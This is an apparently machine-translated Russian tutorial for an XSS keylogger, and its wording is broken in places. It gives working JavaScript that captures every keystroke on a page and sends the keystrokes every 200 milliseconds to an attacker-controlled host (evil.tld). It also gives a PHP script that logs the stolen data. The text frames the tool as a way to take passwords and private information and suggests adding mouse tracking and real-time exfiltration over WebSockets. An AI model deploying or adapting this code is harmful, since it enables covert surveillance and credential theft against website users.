XSS Keylogger

в

едение

Если вы никогда не слышали о XSS Keyloggers, это простой способ захватить информацию о типе пользователя на веб-странице.

Keylogging - это действие записи нажатых клавиш на клавиатуре. 
Ключ-кейлогер можно использовать для шпионажа кого-то, захвата их паролей, перехвата их разговоров или кражи их личной информации.

В большинстве случаев злоумышленник украдет cookie SESSION, чтобы олицетворять целевого пользователя. 
Но в некоторых ситуациях файл cookie SESSION может быть недостаточным, злоумышленнику может понадобиться знать, что набирает целевой пользователь.

• Только cookie HTTP
• Аутентификация без сеанса
• Пароль, необходимый для выполнения действий с более высокими привилегиями

Клиент Javascript Keylogger

Код ниже - крошечный кейлоггер Javascript, он хранит все нажатия клавиш вместе с метками времени в массиве и отправляет их на сервер, контролируемый атакующем через HTTP, каждые 200 миллисекунд.

var buffer = [];
var attacker = 'http://evil.tld/?c='

document.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp
    };
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);

Сервер PHP Keylogger

Чтобы протестировать кейлоггер JavaScript на веб-сервере с PHP,

 вы можете использовать приведенный ниже код.

<?php
if(!empty($_GET['c'])) {
    $logfile = fopen('data.txt', 'a+');
    fwrite($logfile, $_GET['c']);
    fclose($logfile);
}
?>

Этот учебник охватывает очень небольшую часть того, что может сделать бэкдор JavaScript. 
Хорошим улучшением будет отслеживание положения мыши и элемента DOM и отправка всего злоумышленника в режиме реального времени с использованием WebSockets.

Если вы не хотите настраивать это программное обеспечение,

 просто начнете тестирование Https://xsshunter.com .

github.com/xsshunter